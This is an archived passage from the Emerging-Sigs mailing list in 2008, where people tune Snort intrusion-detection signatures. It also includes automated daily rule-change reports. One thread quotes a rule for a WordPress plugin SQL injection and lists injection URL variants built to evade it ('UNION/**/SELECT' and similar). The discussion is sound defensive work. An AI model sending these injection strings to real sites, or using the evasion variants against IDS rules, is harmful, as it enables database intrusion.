05574ba46ca69e91bdeec740cd3af10c [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (4): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500060 || ET COMPROMISED Known Compromised or Hostile Host Traffic (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510060 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500060 || ET COMPROMISED Known Compromised or Hostile Host Traffic (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510060 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (61) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From r.kerr at cranfield.ac.uk Wed Oct 29 15:34:09 2008 From: r.kerr at cranfield.ac.uk (Robert Kerr) Date: Wed, 29 Oct 2008 20:34:09 +0000 Subject: [Emerging-Sigs] pcre in WEB_SPECIFIC rules In-Reply-To: <75253.44173.qm@web59616.mail.ac4.yahoo.com> References: <75253.44173.qm@web59616.mail.ac4.yahoo.com> Message-ID: <1225312449.8695.18.camel@clarity.local.home> On Wed, 2008-10-29 at 08:08 -0700, Mahesh Yelsani wrote: > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET > WEB_SPECIFIC WordPress Newsletter Plugin newsletter Parameter SQL > Injection"; flow:to_server,established; content:"GET "; depth:4; > uricontent:"/st_newsletter/stnl_iframe.php"; nocase; > uricontent:"?newsletter="; nocase; uricontent:"UNION"; nocase; > uricontent:"SELECT"; nocase; pcre:"/UNION\s+SELECT/Ui"; > classtype:web-application-attack; > reference:url,milw0rm.com/exploits/6777; > reference:url,secunia.com/advisories/32336; sid:2008725; rev:1;) > The above Rule catch the following > stnl_iframe.php?newsletter=-9999 UNION SELECT > stnl_iframe.php?newsletter=-9999%20UNION%20SELECT > But it will not catching the following exploits which produce same > results > stnl_iframe.php?newsletter=-9999+UNION+SELECT This is an odd one that needs more testing. I would expect the http pre processor to be normalising + to space in this context. If it isn't in fact doing so it may cause problems for other signatures too. Anyone any insight here? > stnl_iframe.php?newsletter=-9999/**/UNION/**/SELECT > stnl_iframe.php?newsletter=-9999+UNION+all+SELECT > stnl_iframe.php?newsletter=-9999%20UNION%20all%20SELECT But these are all good examples. > If we use .+ it will catch all of them, is there any specific reason > for using \s+ Of course if we use .+ in the general case it can also produce a lot of false positives. For this particular vulnerability where the newsletter parameter is meant to be numeric it's probably not too bad. Consider though that the parameter was text and could contain something like "soviet union historical data selection". SQL being what it is there's no easy way we can be 100% accurate with the keywords snort gives us. You are probably right that it's better to risk the false positives and document them in the rule wiki than risk the false negatives of leaving it with \s+. I don't see the reason we then need a pcre at all? pcre:"/UNION.+SELECT/Ui"; Seems equivalent to: uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; distance:0; -- Robert Kerr From jonkman at jonkmans.com Thu Oct 30 09:55:44 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 30 Oct 2008 10:55:44 -0400 Subject: [Emerging-Sigs] SIDReporter Statistics Message-ID: <4909CAF0.8000606@jonkmans.com> Thanks to everyone that's been contributing data to the SIDReporter project! I'm just starting to dig the statistical needle out of the haystack, and so far so good. I've put up some static statistics to begin looking at: http://www.emergingthreats.net/index.php/sidreporter-statistics.html These will become more interesting the more sites we have reporting, so please consider running the client. It's painless, anonymous, and will contribute to us greatly improving the signature base we all use. The statistics posted have the dynamic IP lists filtered out, as well as some sigs that aren't really attack relevant. The coloring indicates a signature with more than a 50% change in reporting in the previous period. This should show us some upward and downward movers. These are static, generated daily for now. Once we figure out the models that mean something to us I'll get them into a dynamically generated form with charts and graphs which contributors will have access to. A reminder: only active contributors will have access to the more in depth analysis and reporting tools that result from this data. So hop into the mix now to have your say as to how we develop those! You can find more information about SIDReporter here: http://doc.emergingthreats.net/bin/view/Main/SidReporter Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From randy at procyonlabs.com Thu Oct 30 11:26:53 2008 From: randy at procyonlabs.com (Randal T. Rioux) Date: Thu, 30 Oct 2008 12:26:53 -0400 (EDT) Subject: [Emerging-Sigs] SIDReporter Statistics In-Reply-To: <4909CAF0.8000606@jonkmans.com> References: <4909CAF0.8000606@jonkmans.com> Message-ID: <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote: > Thanks to everyone that's been contributing data to the SIDReporter > project! I'm just starting to dig the statistical needle out of the > haystack, and so far so good. I've put up some static statistics to begin > looking at: > > http://www.emergingthreats.net/index.php/sidreporter-statistics.html This is far more interesting than I initially considered it would be. Nice work, anxious to see it progress. Randy From jonkman at jonkmans.com Thu Oct 30 11:36:30 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 30 Oct 2008 12:36:30 -0400 Subject: [Emerging-Sigs] SIDReporter Statistics In-Reply-To: <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> References: <4909CAF0.8000606@jonkmans.com> <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> Message-ID: <4909E28E.1050307@jonkmans.com> I'm eager to see how much more we can get. It's definitely going to be useful information. We need more diverse submitters though. Everyone please consider taking a minute to install and run the sidreporter. It's secure, anonymous, and painless. :) Ideas on other ways to slice and dice this data? I'm moving into numbers of unique sources for the attack/scan/exploit sigs. Takes some time to define who's the bad side in each sid, but once done I'll get some entropy numbers up for those. More sources == MUCH better stats! Matt Randal T. Rioux wrote: > On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote: >> Thanks to everyone that's been contributing data to the SIDReporter >> project! I'm just starting to dig the statistical needle out of the >> haystack, and so far so good. I've put up some static statistics to begin >> looking at: >> >> http://www.emergingthreats.net/index.php/sidreporter-statistics.html > > This is far more interesting than I initially considered it would be. Nice > work, anxious to see it progress. > > Randy > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jlewis at packetnexus.com Thu Oct 30 13:31:22 2008 From: jlewis at packetnexus.com (Jason Lewis) Date: Thu, 30 Oct 2008 14:31:22 -0400 Subject: [Emerging-Sigs] SIDReporter Statistics In-Reply-To: <4909E28E.1050307@jonkmans.com> References: <4909CAF0.8000606@jonkmans.com> <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> <4909E28E.1050307@jonkmans.com> Message-ID: <4909FD7A.3080900@packetnexus.com> Are you looking for things beyond the common breakdowns by AS, CIDR and Country? jas Matt Jonkman wrote: > I'm eager to see how much more we can get. It's definitely going to be > useful information. > > We need more diverse submitters though. Everyone please consider taking > a minute to install and run the sidreporter. It's secure, anonymous, and > painless. :) > > Ideas on other ways to slice and dice this data? I'm moving into numbers > of unique sources for the attack/scan/exploit sigs. Takes some time to > define who's the bad side in each sid, but once done I'll get some > entropy numbers up for those. > > More sources == MUCH better stats! > > Matt > > Randal T. Rioux wrote: > >> On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote: >> >>> Thanks to everyone that's been contributing data to the SIDReporter >>> project! I'm just starting to dig the statistical needle out of the >>> haystack, and so far so good. I've put up some static statistics to begin >>> looking at: >>> >>> http://www.emergingthreats.net/index.php/sidreporter-statistics.html >>> >> This is far more interesting than I initially considered it would be. Nice >> work, anxious to see it progress. >> >> Randy >> >> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > > From jonkman at jonkmans.com Thu Oct 30 13:35:11 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 30 Oct 2008 14:35:11 -0400 Subject: [Emerging-Sigs] SIDReporter Statistics In-Reply-To: <4909FD7A.3080900@packetnexus.com> References: <4909CAF0.8000606@jonkmans.com> <6a6c6220aad835c5f6a2a84cbdf1f4dd.squirrel@meteor.procyonlabs.com> <4909E28E.1050307@jonkmans.com> <4909FD7A.3080900@packetnexus.com> Message-ID: <4909FE5F.5050701@jonkmans.com> I will be, but not yet. I'm very interested in getting some stats up to the asn level for reputation purposes. Country will be interesting, wonder if that'd be reliable enough to act upon? Likely asn would be the largest block safe to make decisions on, and /24 the biggest I'd personally block on. But we'll have to see how the numbers work out. Contributors will get access to all of the statistics we can share, so hop in! :) Matt Jason Lewis wrote: > Are you looking for things beyond the common breakdowns by AS, CIDR and > Country? > > jas > > Matt Jonkman wrote: >> I'm eager to see how much more we can get. It's definitely going to be >> useful information. >> >> We need more diverse submitters though. Everyone please consider taking >> a minute to install and run the sidreporter. It's secure, anonymous, and >> painless. :) >> >> Ideas on other ways to slice and dice this data? I'm moving into numbers >> of unique sources for the attack/scan/exploit sigs. Takes some time to >> define who's the bad side in each sid, but once done I'll get some >> entropy numbers up for those. >> >> More sources == MUCH better stats! >> >> Matt >> >> Randal T. Rioux wrote: >> >>> On Thu, October 30, 2008 10:55 am, Matt Jonkman wrote: >>> >>>> Thanks to everyone that's been contributing data to the SIDReporter >>>> project! I'm just starting to dig the statistical needle out of the >>>> haystack, and so far so good. I've put up some static statistics to begin >>>> looking at: >>>> >>>> http://www.emergingthreats.net/index.php/sidreporter-statistics.html >>>> >>> This is far more interesting than I initially considered it would be. Nice >>> work, anxious to see it progress. >>> >>> Randy >>> >>> >>> _______________________________________________ >>> Emerging-sigs mailing list >>> Emerging-sigs at emergingthreats.net >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >>> >> > -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From dxp2532 at gmail.com Thu Oct 30 13:46:24 2008 From: dxp2532 at gmail.com (dxp) Date: Thu, 30 Oct 2008 14:46:24 -0400 Subject: [Emerging-Sigs] ET POLICY PE EXE signatures Message-ID: <1225392384.6828.3.camel@kinta> http://doc.emergingthreats.net/2000427 http://doc.emergingthreats.net/2000419 Seems like these two are more or less the same stuff. Wouldn't it make more sense to combine into one? I noticed this while looking at the SidReporter statistics. I think having one signature to detect any PE executable is more efficient as well as better for statistics. - -=[ dxp ]=- 0xA3F3C6E3 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081030/38a336cd/attachment.html -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081030/38a336cd/attachment.bin From jonkman at jonkmans.com Thu Oct 30 14:07:44 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Thu, 30 Oct 2008 15:07:44 -0400 Subject: [Emerging-Sigs] ET POLICY PE EXE signatures In-Reply-To: <1225392384.6828.3.camel@kinta> References: <1225392384.6828.3.camel@kinta> Message-ID: <490A0600.1050702@jonkmans.com> You're right, and I think 2000419 appears to be the more accurate one. I'll drop 2000427 barring any objections to eliminate the duplicated effort. Already getting good stuff out of SIDReporter!! Matt dxp wrote: > http://doc.emergingthreats.net/2000427 > http://doc.emergingthreats.net/2000419 > > Seems like these two are more or less the same stuff. Wouldn't it make > more sense to combine into one? > I noticed this while looking at the SidReporter statistics. I think > having one signature to detect any PE executable is more efficient as > well as better for statistics. > > - > > -=[ dxp ]=- > 0xA3F3C6E3 > > > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From emerging at emergingthreats.net Thu Oct 30 15:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Thu, 30 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081030200008.88E764502D@goliath.jonkmans.com> [***] Results from Oinkmaster started Thu Oct 30 16:00:08 2008 [***] [///] Modified active rules: [///] 2002395 - ET MALWARE Miva User Agent (TPSystem) (emerging-malware.rules) [---] Disabled rules: [---] 2000427 - ET POLICY PE EXE Install Windows file download (emerging-policy.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-policy.rules (1): #Disabling as it overlaps with 2000419 From emerging at emergingthreats.net Fri Oct 31 15:00:08 2008 From: emerging at emergingthreats.net (emerging@emergingthreats.net) Date: Fri, 31 Oct 2008 16:00:08 -0400 (EDT) Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes Message-ID: <20081031200008.145F24502B@goliath.jonkmans.com> [***] Results from Oinkmaster started Fri Oct 31 16:00:08 2008 [***] [+++] Added rules: [+++] 2008734 - ET MALWARE Suspicious User-Agent Detected (WINS_HTTP_SEND Program/1.0) (emerging-malware.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-sid-msg.map (1): 2008734 || ET MALWARE Suspicious User-Agent Detected (WINS_HTTP_SEND Program/1.0) -> Added to emerging-sid-msg.map.txt (1): 2008734 || ET MALWARE Suspicious User-Agent Detected (WINS_HTTP_SEND Program/1.0) [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (4): 2500058 || ET COMPROMISED Known Compromised or Hostile Host Traffic (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500059 || ET COMPROMISED Known Compromised or Hostile Host Traffic (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510058 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510059 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (4): 2500058 || ET COMPROMISED Known Compromised or Hostile Host Traffic (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500059 || ET COMPROMISED Known Compromised or Hostile Host Traffic (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510058 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (59) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510059 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (60) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts